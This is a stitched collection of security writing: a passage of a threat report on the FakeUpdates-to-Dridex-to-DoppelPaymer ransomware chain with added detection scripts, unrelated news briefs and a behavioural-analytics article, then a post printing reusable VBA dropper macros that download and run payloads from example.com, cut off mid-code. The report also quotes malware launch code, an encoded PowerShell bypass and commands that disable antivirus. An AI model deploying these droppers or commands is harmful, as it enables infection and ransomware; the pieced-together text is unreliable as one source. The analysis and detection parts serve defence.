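                       ("get", SAMPLE_BENIGN_GET), ("post", SAMPLE_BENIGN_POST)]:
        print(f"{label}: {classify_raw(raw)}")
```

A rule like this belongs on a proxy or IDS that sees decrypted or plaintext HTTP; the Age-header check alone is low confidence and is best combined with the body shape and the later chunked-encoded response.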

After receiving the system information, the C2 server responds with an encoded payload delivered via chunked transfer-encoding to the infected system. This technique evades conventional IDS/IPS appliances, allowing for the second-stage payload to successfully download. During our investigations and FireEye Intelligence’s monitoring, we recovered encoded payloads that delivered one of the following:

  • Dridex (Figure 7)
  • NetSupport Manager Remote Access Tool (RAT) (Figure 8)
  • Chthonic or AZORult (Figure 9)

    function runFile() {
        var lastException = '';
        try {
            var wsh = new ActiveXObject("WScript.Shell");
            wsh.Run('cmd /C rename "' + _tempFilePathSave + '" "' + execFileName + '"');
            WScript.Sleep(3 * 1000);
            runFileResult = wsh.Run('"' + _tempFilePathExec + '"');
            lastException = '';
        } catch (error) {
            lastException = error.number;
            runFileExeption += 'error number:' + error.number + ' message:' + error.message;
        }
    }

Figure 7: Code excerpt observed in FakeUpdates used to launch Dridex payloads

    function runFile() {
        var lastException = '';
        try {
            var wsh = new ActiveXObject("WScript.Shell");
            runFileResult = wsh.Run('"' + _tempFilePathExec + '" /verysilent');
            lastException = '';
        } catch (error) {
            lastException = error.number;
            runFileExeption += 'error number:' + error.number + ' message:' + error.message;
        }
    }

Figure 8: Code excerpt observed in FakeUpdates used to launch NetSupport payloads

    function runFile() {
        var lastException = '';
        try {
            var wsh = new ActiveXObject("WScript.Shell");
            runFileResult = wsh.Run('"' + _tempFilePathExec + '"');
            lastException = '';
        } catch (error) {
            lastException = error.number;
            runFileExeption += 'error number:' + error.number + ' message:' + error.message;
        }
    }

Figure 9: Code excerpt observed in FakeUpdates used to launch Chthonic and AZORult payloads

During this process, the victim system downloads and executes nircmdc.exe, a utility specifically used during the infection process to save two system screenshots. Figure 10 provides an example command used to capture the desktop screenshots.

"C:\Users\User\AppData\Local\Temp\nircmdc.exe" savescreenshot "C:\Users\User\AppData\Local\Temp\6206a2e3dc14a3d91.png"

Figure 10: Sample command used to execute the Nircmd tool to take desktop screenshots

The PNG screenshots of the infected systems are then transferred to the C2 server, after which they are deleted from the system. Figure 11 provides an example of an HTTP POST request, again with the custom Age and User-Agent headers.


Figure 11: Screenshots of the infected system are sent to an attacker-controlled C2

Interestingly, the screenshot file transfers were neither encoded nor obfuscated, as with other data elements transferred by the FakeUpdates malware. As soon as the screenshots are transferred, nircmdc.exe is deleted.

All Hands on Deck

In certain investigations, the incident was far from over. Following the distribution of Dridex v4 binaries (botnet IDs 199 and 501), new tools and frameworks began to appear. FireEye identified that the threat actors leveraged their Dridex backdoor(s) to execute the publicly-available PowerShell Empire and/or Koadic post-exploitation frameworks. Managed Defense also identified the FakeUpdates to Dridex infection chain resulting in the download and execution of PoshC2, another publicly available tool. While it could be coincidental, it is worth noting that the use of PoshC2 was first observed in early September 2019 following the announcement that Empire would no longer be maintained, and could represent a shift in attacker TTPs. These additional tools were often executed between 30 minutes and 2 hours after the initial Dridex download. The pace of the initial phases of related attacks suggests that automated post-compromise techniques are used in part before interactive operator activity occurs.

We identified extensive usage of Empire and C2 communication to various servers during these investigations. For example, via process tracking, we identified a Dridex-injected explorer.exe executing malicious PowerShell: a clear sign of an Empire stager:


Figure 12: An example of PowerShell Empire stager execution revealed during forensic analysis

In the above example, the threat actors instructed the victim system to use the remote server 185.122.59[.]78 for command-and-control using an out-of-the-box Empire agent C2 configuration for TLS-encrypted backdoor communications.

During their hands-on post-exploitation activity, the threat actors also moved laterally via PowerShell remoting and RDP sessions. FireEye identified the use of WMI to create remote PowerShell processes, subsequently used to execute Empire stagers on domain-joined systems. In one specific case, the time delta between initial Empire backdoor and successful lateral movement was under 15 minutes. Another primary goal for the threat actor was internal reconnaissance of both the local system and domain the computer was joined to. Figure 13 provides a snippet of Active Directory reconnaissance commands issued by the attacker during one of our investigations.


Figure 13: Attacker executed commands

The threat actors used an Empire module named SessionGopher and the venerable Mimikatz to harvest endpoint session and credential information. Finally, we also identified the attackers utilized Empire’s Invoke-EventVwrBypass, a Windows bypass technique used to launch executables using eventvwr.exe, as shown in Figure 14.

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x


Figure 14: PowerShell event viewer bypass

Ransomware Attacks & Operator Tactics

Within these investigations, FireEye identified the deployment of BitPaymer or DoppelPaymer ransomware. While these ransomware variants are highly similar, DoppelPaymer uses additional obfuscation techniques. It also has enhanced capabilities, including an updated network discovery mechanism and the requirement of specific command-line execution. DoppelPaymer also uses a different encryption and padding scheme.

The ransomware and additional reconnaissance tools were downloaded through public file-sharing websites such as DropMeFiles and SendSpace. Irrespective of the ransomware deployed, the attacker used the SysInternals utility PSEXEC to distribute and execute the ransomware.

Notably, in the DoppelPaymer incident, FireEye identified that Dridex v2 with the Botnet ID 12333 was downloaded onto the same system previously impacted by an instance of Dridex v4 with Botnet ID 501. Within days, this secondary Dridex instance was then used to enable the distribution of DoppelPaymer ransomware.  Prior to DoppelPaymer, the threat actor deleted volume shadow copies and disabled anti-virus and anti-malware protections on select systems. Event log artifacts revealed commands executed through PowerShell which were used to achieve this step (Figure 15):

Event Log | EID | Message

Microsoft-Windows-PowerShell%4Operational | 600 | HostApplication=powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true

Microsoft-Windows-PowerShell%4Operational | 600 | HostApplication=powershell.exe Uninstall-WindowsFeature -Name Windows-Defender

Application | 1034 | Windows Installer removed the product. Product Name: McAfee Agent-++-5.06.0011-++-1033-++-1603-++-McAfee, Inc.-++-(NULL)-++--++-. Product Version: 82.

Figure 15: Event log entries related to the uninstallation of AV agents and disablement of real-time monitoring
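An added detection example (not FireEye’s code or its signature set) covering the event log entries in Figure 15 and the eventvwr.exe bypass command in Figure 14: each record is matched against a small rule set, and a host is escalated when several distinct tampering steps land on it within an hour. The hostnames, timestamps and record layout are constructed; the rule names are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Set

PS_LOG = "Microsoft-Windows-PowerShell%4Operational"

# Constructed rules: (rule name, event log, event id, message pattern).
# The first three mirror the entries in Figure 15; the last matches the
# Figure 14 pattern of a payload read from a key under HKCU and handed to a
# hidden, encoded PowerShell.
RULES = [
    ("defender-realtime-disabled", PS_LOG, 600,
     re.compile(r"Set-MpPreference\b.*-DisableRealtimeMonitoring\s+\$true", re.I)),
    ("defender-feature-uninstalled", PS_LOG, 600,
     re.compile(r"Uninstall-WindowsFeature\b.*Windows-Defender", re.I)),
    ("av-product-removed", "Application", 1034,
     re.compile(r"Windows Installer removed the product\. Product Name: [^.]*"
                r"(McAfee|Defender|Antivirus|Anti-Virus)", re.I)),
    ("eventvwr-bypass-registry-payload", PS_LOG, 600,
     re.compile(r"HKCU:\\?Software\\Microsoft\\Windows Update.*-enc\b", re.I)),
]


def match_rules(record: Dict[str, object]) -> List[str]:
    """Names of every rule the record matches (log and EID must agree)."""
    return [name for name, log, eid, pattern in RULES
            if record["log"] == log and record["eid"] == eid
            and pattern.search(str(record["message"]))]


def hosts_at_risk(records, min_rules: int = 2, window: timedelta = timedelta(hours=1)) -> Set[str]:
    """Hosts on which at least `min_rules` distinct rules fired within `window`.

    One disabled-realtime-monitoring event may be an administrator at work;
    several distinct tampering steps on one host in a short span is the
    pre-ransomware pattern described above and is escalated.
    """
    per_host = defaultdict(list)          # host -> [(time, rule name)]
    for rec in records:
        for rule in match_rules(rec):
            per_host[rec["host"]].append((rec["time"], rule))
    flagged = set()
    for host, hits in per_host.items():
        hits.sort()
        for i, (t0, _) in enumerate(hits):
            rules_in_window = {r for t, r in hits[i:] if t - t0 <= window}
            if len(rules_in_window) >= min_rules:
                flagged.add(host)
                break
    return flagged


def _rec(host, ts, log, eid, message):
    return {"host": host, "time": datetime.fromisoformat(ts), "log": log, "eid": eid, "message": message}


# Constructed sample records (hostnames and times are made up).
SAMPLE_RECORDS = [
    _rec("WS01", "2019-09-10T02:14:05", PS_LOG, 600,
         "HostApplication=powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true"),
    _rec("WS01", "2019-09-10T02:15:40", PS_LOG, 600,
         "HostApplication=powershell.exe Uninstall-WindowsFeature -Name Windows-Defender"),
    _rec("WS01", "2019-09-10T02:21:12", "Application", 1034,
         "Windows Installer removed the product. Product Name: McAfee Agent-++-5.06.0011"
         "-++-1033-++-1603-++-McAfee, Inc.-++-(NULL)-++--++-. Product Version: 82."),
    _rec("WS02", "2019-09-10T09:00:00", PS_LOG, 600,
         "HostApplication=powershell.exe Get-MpPreference"),
    _rec("WS03", "2019-09-10T11:30:00", PS_LOG, 600,
         "HostApplication=powershell.exe -NoP -NonI -c $x=$((gp HKCU:Software\\Microsoft"
         "\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x"),
]

if __name__ == "__main__":
    for rec in SAMPLE_RECORDS:
        print(rec["host"], rec["time"].time(), match_rules(rec))
    print("escalate:", sorted(hosts_at_risk(SAMPLE_RECORDS)))
```

The single eventvwr.exe hit on WS03 is still returned by match_rules for triage; only the clustered tampering on WS01 crosses the escalation threshold.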

The DoppelPaymer ransomware was found in an Alternate Data Stream (ADS) in randomly named files on disk. ADSs are attributes within NTFS that allow for a file to have multiple data streams, with only the primary being visible in tools such as Windows Explorer. After ransomware execution, files are indicated as encrypted by being renamed with a “.locked” file extension. In addition to each “.locked” file, there is a ransom note with the file name “readme2unlock.txt” which provides instructions on how to decrypt files.


Figure 16: DoppelPaymer ransomware note observed during a Mandiant Incident Response investigation

Ransomware? Not In My House!

Over the past few years, we have seen ransomware graduate from a nuisance malware to one being used to extort victim networks out of significant sums of money. Furthermore, threat actors are now coupling ransomware with multiple toolkits or other malware families to gain stronger footholds into an environment. In this blog post alone, we witnessed a threat actor move through multiple toolsets - some automated, some manual - with the ultimate goal of holding the victim organization hostage.

Ransomware also raises the stakes for unprepared organizations as it levels the playing field for all areas of your enterprise. Ransomware proves that threat actors don’t need to get access to the most sensitive parts of your organization – they need to get access to the ones that will disrupt business processes. This widens your attack surface, but luckily, also gives you more opportunity for detection and response. Mandiant recently published an in depth white paper on Ransomware Protection and Containment Strategies, which may help organizations mitigate the risk of ransomware events.

Indicators

The following indicator set is a collective representation of artifacts identified during investigations into multiple customer compromises.

Detecting the Techniques

FireEye detects this activity across our platforms, including named detections for Dridex, Empire, BitPaymer and DoppelPaymer Ransomware. As a result of these investigations, FireEye additionally deployed new indicators and signatures to Endpoint and Network Security appliances.  This table contains several specific detection names from a larger list of detections that were available prior to this activity occurring.

Platform / Signature Name

Endpoint Security:
  HX Exploit Detection
  Empire RAT (BACKDOOR)
  EVENTVWR PARENT PROCESS (METHODOLOGY)
  Dridex (BACKDOOR)
  Dridex A (BACKDOOR)
  POWERSHELL SSL VERIFICATION DISABLE (METHODOLOGY)
  SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)
  FAKEUPDATES SCREENSHOT CAPTURE (METHODOLOGY)

Network Security:
  Backdoor.FAKEUPDATES
  Trojan.Downloader.FakeUpdate
  Exploit.Kit.FakeUpdate
  Trojan.SSLCert.SocGholish

MITRE ATT&CK Technique Mapping

ATT&CK Tactic | Techniques

Initial Access: Drive-by Compromise (T1189), Exploit Public-Facing Application (T1190)

Execution: PowerShell (T1086), Scripting (T1064), User Execution (T1204), Windows Management Instrumentation (T1047)

Persistence: DLL Search Order Hijacking (T1038)

Privilege Escalation: Bypass User Account Control (T1088), DLL Search Order Hijacking (T1038)

Defense Evasion: Bypass User Account Control (T1088), Disabling Security Tools (T1089), DLL Search Order Hijacking (T1038), File Deletion (T1107), Masquerading (T1036), NTFS File Attributes (T1096), Obfuscated Files or Information (T1027), Scripting (T1064), Virtualization/Sandbox Evasion (T1497)

Credential Access: Credential Dumping (T1003)

Discovery: Account Discovery (T1087), Domain Trust Discovery (T1482), File and Directory Discovery (T1083), Network Share Discovery (T1135), Process Discovery (T1057), Remote System Discovery (T1018), Security Software Discovery (T1063), System Information Discovery (T1082), System Network Configuration Discovery (T1016), Virtualization/Sandbox Evasion (T1497)

Lateral Movement: Remote Desktop Protocol (T1076), Remote File Copy (T1105)

Collection: Data from Local System (T1005), Screen Capture (T1113)

Command And Control: Commonly Used Port (T1436), Custom Command and Control Protocol (T1094), Data Encoding (T1132), Data Obfuscation (T1001), Remote Access Tools (T1219), Remote File Copy (T1105), Standard Application Layer Protocol (T1071)

Exfiltration: Automated Exfiltration (T1020), Exfiltration Over Command and Control Channel (T1041)

Impact: Data Encrypted for Impact (T1486), Inhibit System Recovery (T1490), Service Stop (T1489)

Acknowledgements

A huge thanks to James Wyke and Jeremy Kennelly for their analysis of this activity and support of this post.

Guess what? You should patch Exim again!

Hot on the heels of a patch for a critical RCE Exim flaw comes another one that fixes a denial of service (DoS) condition (CVE-2019-16928) that could also be exploited by attackers to pull off remote code execution. With no mitigations available at this time, Exim maintainers urge admins to upgrade to version 4.92.3, which has been released on Sunday. About Exim and the flaw (CVE-2019-16928) According to E-Soft, Exim is the most widely used … More

The post Guess what? You should patch Exim again! appeared first on Help Net Security.

Behavioral Analytics: Why It Is Significant to Enterprise CyberSecurity

Do you want to know why behavioral analytics is vital to your enterprise? Are you even aware of what behavioral analytics is? What are the threats that it can detect quickly? Is your business in danger because of these threats?

As your company grows, you also need to add more assets and users to your enterprise network. Your business workflows undergo permanent changes as you add applications and databases. These upgrades mean more efficiency and collaboration that will result in more profitability. However, they also translate to more liabilities in terms of cybersecurity.

Each user, digital asset, or application can be an accessible doorway for hackers to invade your network. Also, faulty programming or malice perpetrated by any user can be a threat inside your business. In both cases, they can damage not only your network but your business processes as well.

What can you do? Monitoring every user can be frustrating and overwhelming. Even if you have the workforce, your IT security team can’t sustain the demand. Maintaining visibility on applications and users is close to impossible as your enterprise grows. Is there hope? Yes, there is!

Behavioral analytics can help solve your dilemma efficiently and magnificently. Let us take you to a thorough discussion about the topic.

The Basics of Behavioral Analytics

Behavioral analytics analyzes the patterns, activities, and trends of applications and users, looking for the habits and quirks in your workflows. Each user has a profile in the system. For instance, your employee Arthur uses “Database A” four times a day. Next-generation tooling can also note which endpoint he uses when he requests access, and it records and stores all of this in a behavioral baseline.

Against this baseline it stands out if Arthur, for example, requests access to Database B ten times on a particular workday, or makes the request from thousands of miles away from his usual location. Your security tooling recognizes both behaviors as outside Arthur’s baseline.

It can then block the access requests and alert your IT security team so it can investigate. Arthur may be on a business trip that day and need information not normally relevant to his position; your team can tell the system about the unusual circumstances so that Arthur is allowed to access the files.

The same scenario could also be an attacker using Arthur’s credentials to reach sensitive enterprise data. If so, your IT security team can trigger incident response, cut off the intrusion and return the account to Arthur’s control, and fix any vulnerability it discovers along the way. The same process applies to data traffic, data movement, and requests for applications.

Behavioral analytics leverages statistical analysis and machine learning to monitor the behaviors of your users and search for anomalies.
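The Arthur scenario above, worked through as an added example (not code from the original post): a per-user baseline of daily request counts per resource and usual locations is built from access history, and a day’s activity is scored against it. The history, coordinates and thresholds are constructed assumptions, and the example generalizes the text slightly by also handling a resource the user has never touched.

```python
import math
from collections import defaultdict
from statistics import mean, pstdev
from typing import Dict, List, Set, Tuple

Event = Tuple[str, str, str, float, float]  # (user, day, resource, lat, lon)


def haversine_km(lat1: float, lon1: float, lat2: float, lon2: float) -> float:
    """Great-circle distance between two points, in kilometres."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi, dlmb = math.radians(lat2 - lat1), math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlmb / 2) ** 2
    return 2 * 6371.0 * math.asin(math.sqrt(a))


def build_baseline(history: List[Event]) -> Dict[str, dict]:
    """Per-user baseline: (mean, stddev) of daily request count per resource,
    plus the set of locations the user has been seen from."""
    daily = defaultdict(lambda: defaultdict(lambda: defaultdict(int)))  # user->resource->day->n
    locations: Dict[str, Set[Tuple[float, float]]] = defaultdict(set)
    for user, day, resource, lat, lon in history:
        daily[user][resource][day] += 1
        locations[user].add((lat, lon))
    baseline = {}
    for user, resources in daily.items():
        stats = {res: (mean(per_day.values()), pstdev(per_day.values()))
                 for res, per_day in resources.items()}
        baseline[user] = {"resources": stats, "locations": locations[user]}
    return baseline


def score_day(baseline: Dict[str, dict], user: str, events: List[Tuple[str, float, float]],
              k: float = 3.0, min_excess: int = 3, max_km: float = 500.0) -> List[str]:
    """Anomalies in one user's events (resource, lat, lon) for a single day.

    location:        a request from further than max_km from every known location
    unseen-resource: a resource the user has never accessed before
    volume:          more requests than mean + k*stddev, and at least min_excess
                     above the mean so a tight baseline does not fire on +1
    """
    profile = baseline.get(user)
    if profile is None:
        return ["unknown-user"]
    findings, counts, far = [], defaultdict(int), set()
    for resource, lat, lon in events:
        counts[resource] += 1
        if all(haversine_km(lat, lon, blat, blon) > max_km for blat, blon in profile["locations"]):
            far.add((lat, lon))
    for lat, lon in sorted(far):
        findings.append(f"location:{lat:.2f},{lon:.2f}")
    for resource, n in counts.items():
        stats = profile["resources"].get(resource)
        if stats is None:
            findings.append(f"unseen-resource:{resource}")
            continue
        mu, sigma = stats
        if n > mu + k * sigma and n - mu >= min_excess:
            findings.append(f"volume:{resource}:{n}")
    return findings


# Constructed history: Arthur uses Database A about four times a day from London
# for ten days and touched Database B once. Coordinates are rounded city centres.
LONDON, NEW_YORK = (51.51, -0.13), (40.71, -74.01)


def _days(user: str, resource: str, per_day_counts: List[int], loc: Tuple[float, float]) -> List[Event]:
    out: List[Event] = []
    for i, n in enumerate(per_day_counts, start=1):
        out += [(user, f"2019-09-{i:02d}", resource, loc[0], loc[1])] * n
    return out


HISTORY = (_days("arthur", "Database A", [3, 4, 5, 4, 4, 3, 5, 4, 4, 4], LONDON)
           + _days("arthur", "Database B", [1], LONDON))
BASELINE = build_baseline(HISTORY)
NORMAL_DAY = [("Database A", *LONDON)] * 4
TRAVEL_DAY = [("Database B", *NEW_YORK)] * 10   # the scenario from the text

if __name__ == "__main__":
    print("normal:", score_day(BASELINE, "arthur", NORMAL_DAY))
    print("travel:", score_day(BASELINE, "arthur", TRAVEL_DAY))
```

The travel day is flagged twice, for the distant location and for the request volume; whether that is a business trip or stolen credentials is the investigation the text describes, which the scoring only triggers.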

Why Is Behavioral Analytics Critical to Cybersecurity?

Jack Vance wrote The Moon Moth. It is a famous short story in the science-fiction genre. The plot revolves around an imposter who can alter his appearance but can’t conceal his habits and tastes.

This observation also holds for real attackers. In a report by Centrify, a privileged access management vendor, 74% of business breaches start with a compromised privileged account, and other studies put the share of breaches that begin with a compromised account at 80% or more. In other words, attackers prefer to disguise themselves as one of your users.

The damage attackers can cause is significant: reputational loss and downtime, especially if they destroy parts of your network. They may try to tamper with your users’ baseline behaviors, but when they do, behavioral analytics can flag the attempts, stop them, and trigger a response from your IT team.

Moreover, this cybersecurity must-have relieves your IT security team of much of its burden. The team may already feel overworked by threat hunting and user requests, and a staffing crisis can follow if things get out of control. Behavioral analytics runs automatically and helps your IT staff streamline investigations, saving time.

Deploying Behavioral Analytics

First consider your organization’s size, user base, IT infrastructure, industry, and applications, and think about your growth and scaling plans for the next five years. This must be the initial step in selecting any cybersecurity solution, yet many companies neglect it.

Most enterprises choose speed over optimal performance: they pick the solution that adequately solves their immediate problems. The result is an IT infrastructure made up of many solutions with serious integration issues.

If you want long-term solutions to your cybersecurity issues, you must consider behavioral analytics. If you’ve decided to incorporate it in your enterprise, your next step is choosing a robust Security Information and Event Management (SIEM) solution.

Why Do You Need a SIEM solution?

A SIEM solution is the next-generation form of behavioral analytics: it includes user and entity behavioral analytics (UEBA), and you can add threat intelligence feeds to detect new or expanded threats quickly.

You may think a SIEM solution is complicated, and you’re right. At its core it is a log management and analysis tool with a behavioral analysis layer added on top. Security teams accept that digital perimeters cannot deflect 100% of threats; with a SIEM system, however, you can detect the threats that would otherwise wreak havoc on your enterprise.

Attackers are everywhere, waiting for an opportunity to strike. Next-generation analytics and cybersecurity capabilities let you monitor and stop them. A SIEM solution with UEBA and similar capabilities is an excellent way to catch them before they intrude and cause severe downtime that compromises your reputation.

Darknet hosting provider busted in underground NATO bunker

Police overcame not only digital defenses of the "bulletproof" provider CyberBunker but also barbed wire fences and surveillance cams.

Six in 10 Global Firms Hit by a Data Breach

Around 60% of global organizations have suffered a breach in the past three years, with the rest increasingly feeling like their turn is coming soon, according to new research from Bitdefender.

The security firm polled over 6000 cybersecurity professionals from organizations of all sizes in the UK, US, Australia, New Zealand, Germany, France, Italy and Spain to compile its Hacked Off! study.

While six in 10 respondents said they’d been hit by a data breach, 36% claimed they could be facing one without knowing. It’s no surprise that over half (58%) are concerned about the readiness of their organization to deal with such an attack.

Board-level buy-in is a major sticking point: 57% of respondents claimed that the C-suite is the least likely to comply with corporate cybersecurity policy, putting their firm at risk and making it hard to drive the kind of company-wide security-by-design culture demanded by GDPR and other regulators.

Nearly three-quarters (73%) believe they’re more at risk as they are under-resourced, while alert fatigue is a major problem, with over half (53%) of endpoint detection and response (EDR) alerts described as false alarms.

The research found that, partly because of this EDR failure, firms are reacting too slowly to incidents.

Over a fifth (29%) claimed it would take a week or longer to detect an advanced cyber-attack, while just three in every 100 cybersecurity professionals claimed 100% of attacks can be efficiently detected and isolated.

Yet despite all of these shortcomings, more than half (57%) of respondents rated their organization’s cybersecurity “very good” or “excellent.”

Liviu Arsene, global cybersecurity researcher at Bitdefender, explained that further investments in anti-malware, network traffic analysis and EDR were all highlighted by respondents as necessary.

“Poor cybersecurity is an undeniable threat to businesses today. From the loss of customer trust to the impact on the bottom line it is critical for infosec professionals to get it right,” he added.

“According to respondents, 53% of infosec professionals have contemplated leaving their job due to under-resourcing in terms of staff. Resources are in fact such a bugbear that infosec pros say the main obstacles to their organizations’ strengthening their cybersecurity posture are a lack of budget and a lack of skilled personnel.”

What are you doing for European Cyber Security Month?

In a month where many people’s biggest concerns are pumpkin-related, you might consider putting equal effort into something more substantial. October is National Cyber Security Awareness Month, where people are encouraged to brush up on their everyday information security practices.

With an estimated 2 million cyber attacks last year costing victims £36 billion, there is a lot to be gained from tightening up the way you handle sensitive information.

What is European Cyber Security Month?

Cyber Security Month is an EU awareness campaign that promotes cyber security in the workplace and at home.

It aims to make people understand the threat of cyber crime and the way our actions help or hinder attacks.

Our shared responsibility

The theme of this year’s campaign is “cyber security is a shared responsibility”, which can be interpreted in a couple of ways.

First, it refers to the three aspects of cyber security: people, processes and technology. IT departments must implement software and other security controls to remove vulnerabilities, organisations must create processes that explain to employees how to keep information secure, and people must follow those instructions.

If anyone fails to perform their role, the chance of a data breach increases dramatically.

Cyber security is equally everybody’s responsibility in that no one is exempt from best practices. Senior employees might delegate responsibility or complain that they are too busy to follow certain processes. Similarly, some employees might assume that one person won’t make a difference and so they can cut corners when it comes to things like password management or doing work on a public Wi-Fi.

But if everyone obeys that logic, no one will be following the organisation’s processes. Cyber security best practices can certainly be inconvenient at times, but it only takes one mistake to jeopardise the entire organisation.

What else does Cyber Security Month cover?

The first two weeks cover cyber hygiene, which involves your daily routines and general behaviour when handling sensitive information.

The second half of the month is dedicated to emerging technologies and the way they protect or threaten our security.

This is one of the biggest talking points in the cyber security industry, thanks to the controversial use of biometric data.

Although fingerprints and retinal scans provide a much more secure authentication system than passwords, they also threaten people’s privacy, and breaches of such information have major repercussions.

After all, you can change a password if it’s disclosed but you can’t change your fingerprints.

How you can get involved

There are four events in the UK over the next few weeks that are aligned with European Cyber Security Month:

Technology experts will gather at this event, hosted in Newport, to highlight the threats that organisations face and how they should address their vulnerabilities.

A series of short presentations explaining the threat of cyber crime, the role of law enforcement and what we can do to protect ourselves.

The Isle of Man government’s inaugural cyber security conference features keynote speakers and networking opportunities between the public and private sectors.

This one-day event takes place in Manchester, featuring speeches on how to implement strong security measures and how technological advancements create opportunities and challenges for staying secure.

What are we doing for Cyber Security Month?

At the risk of sounding trite, every month is cyber security awareness month at IT Governance. We are committed to helping people improve their cyber security practices, through our blog, webinars, green papers, tools and services.

October is no exception. We’ll be linking to resources that can help keep you and your organisation secure, and sharing cyber security tips and stats to remind you of what you’re up against.

You wouldn’t ignore a medical expert’s advice. Why risk your cyber health?

Don’t risk it, cyber secure it this Cyber Security Month. Find out how to keep your organisation healthy with our dedicated tips.

The post What are you doing for European Cyber Security Month? appeared first on IT Governance Blog.

Over A Billion Malicious Ad Impressions Exploit WebKit Flaw to Target Apple Users

The infamous eGobbler hacking group that surfaced online earlier this year with massive malvertising campaigns has now been caught running a new campaign exploiting two browser vulnerabilities to show intrusive pop-up ads and forcefully redirect users to malicious websites. To be noted, hackers haven't found any way to run ads for free; instead, the modus operandi of eGobbler attackers

Hashtag Trending – WeWork pulls its IPO; Facebook testing out removing visible likes; female streamers face harassment on Twitch

The chaos surrounding WeWork continues and it is trending on Google. Last week saw the exit of their CEO Adam Neumann and rumors that his inner circle will be shown the door along with thousands of other employees. And…

HMRC Disciplines 100 Staff for IT Misuse

Nearly 100 HMRC employees have faced disciplinary action after misusing computer systems over the past two years, according to Parliament Street.

The think tank sent Freedom of Information (FOI) requests to the UK tax office to better understand the insider threat there.

It revealed that 92 staff members had misused IT systems over the previous two financial years, with eight sacked for their indiscretions.

Most common was misuse of email, with 15 written warnings issued in 2017-18 and a further 11 in 2018-19. According to the think tank, the culprit in many of these was a repeat offender, who had also been issued with a final written warning for computer misuse.

In 2018-19, nine written warnings were issued for misuse of social media channels, compared to zero the previous year.

In addition, 13 HMRC employees were reprimanded for misuse of telecommunications, and 19 were disciplined for misuse of computer equipment or systems.

In fact, all eight dismissals were for “misuse of computer equipment.”

Absolute Software CEO, Christy Wyatt, said tackling insider abuses should be a top priority for the public sector, especially organizations handling highly sensitive financial data on millions of citizens.

“This kind of activity often involves individuals abusing access to personal information and in some cases sharing it, leading to a potential data breach,” she added.

“Organizations like HMRC need to adopt an enterprise resilience mindset not only around potential bad employee behavior, but fortifying their overall security posture and risk management profile.”

The HMRC has been called out before for poor data protection practices. In May, privacy regulator the ICO handed it an enforcement notice after it broke the law over collection of biometric data from taxpayers.

Some 20% of cybersecurity incidents and 15% of the data breaches investigated by Verizon this year were linked to insiders, according to its Data Breach Investigations Report (DBIR).

Frequent VBA Macros used in Office Malware

The malware expert Marco Ramilli collected a small set of VBA Macros widely re-used to “weaponize” Maldoc (Malware Document) in cyber attacks.

Nowadays one of the most frequent cybersecurity threats comes from malicious (Office) documents shipped over email or instant messaging. Some analyzed examples include: Step By Step Office Dropper Dissection, Spreading CVS Malware over Google, Microsoft Powerpoint as Malware Dropper, MalHIDE, Info Stealing: a New Operation in the Wild, Advanced All in Memory CryptoWorm, etc. Many analyses over the past few years have shown that attackers love to re-use code: they prefer to modify, obfuscate and finally encrypt already known code rather than writing new “attacking modules” from scratch. Hence the idea to collect a small set of VBA Macros widely re-used to “weaponize” Maldocs (Malware Documents) in contemporary cyber attacks.

Very frequently Office documents such as Microsoft Excel or Word files are used as droppers. The core concept of a dropper is to download and execute a third-party payload (or second stage), and when you analyse an Office dropper you will often run into many layers of obfuscation. Obfuscation exists to make the analysis harder, but once you get past that stage you will probably see VBA code looking like the following.

Download And Execute an External Program

Private Sub DownloadAndExecute()
    Dim droppingURL As String
    Dim localPath As String
    Dim WinHttpReq As Object, oStream As Object
    Dim result As Integer
    
    droppingURL = "https://example.com/mal.exe"
    localPath = "c://asd.exe"
    
    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP")
    WinHttpReq.setOption(2) = 13056 ' Ignore cert errors
    WinHttpReq.Open "GET", droppingURL, False ', "username", "password"
    WinHttpReq.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
    WinHttpReq.Send
    
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1
        oStream.Write WinHttpReq.ResponseBody
        oStream.SaveToFile localPath, 2  ' 1 = no overwrite, 2 = overwrite (will not work with file attrs)
        oStream.Close
        CreateObject("WScript.Shell").Run localPath, 0
    End If    
    
End Sub

The main idea behind this function (or sub-routine) is to invoke the ServerXMLHTTP object to download a file from an external resource, save it to a local directory (ADODB.Stream object) and finally execute it through the WScript.Shell object. You might find variants of this behavior: for example, language checks to target specific countries, or checks for an already infected machine, such as avoiding network traffic if the file is already present at localPath. A very common way to add such an infection check on the same victim is to add the following condition before the HTTP request.

If Dir(localPath, vbHidden + vbSystem) = "" Then

Another very common way to weaponize Office files is to download and execute a DLL instead of an external executable. In such a case the exported DLL function can be invoked directly from the VBA code, as follows.

Drop And Execute External DLL

Private Sub DropAndRunDll()
    Dim dll_Loc As String
    dll_Loc = Environ("AppData") & "\Microsoft\Office"
    If Dir(dll_Loc, vbDirectory) = vbNullString Then
        Exit Sub
    End If
    
    VBA.ChDir dll_Loc
    VBA.ChDrive "C"
    
    'Download DLL
    Dim dll_URL As String
    dll_URL = "https://example.com/mal.dll"

    Dim WinHttpReq As Object
    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
    WinHttpReq.Open "GET", dll_URL, False
    WinHttpReq.send

    myURL = WinHttpReq.responseBody
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1
        oStream.Write WinHttpReq.responseBody
        oStream.SaveToFile "Saved.asd", 2
        oStream.Close

        ModuleExportedInDLL.Invoke 
    End If
End Sub

Running a DLL or an external PE is not the only way to run code on the victim machine; PowerShell can be used as well. A neat way to execute PowerShell without direct access to PowerShell.exe is through its DLLs, which the PowerShdll project makes possible, for example in the following way.

Dropping and Executing PowerShell

Sub RunDLL()
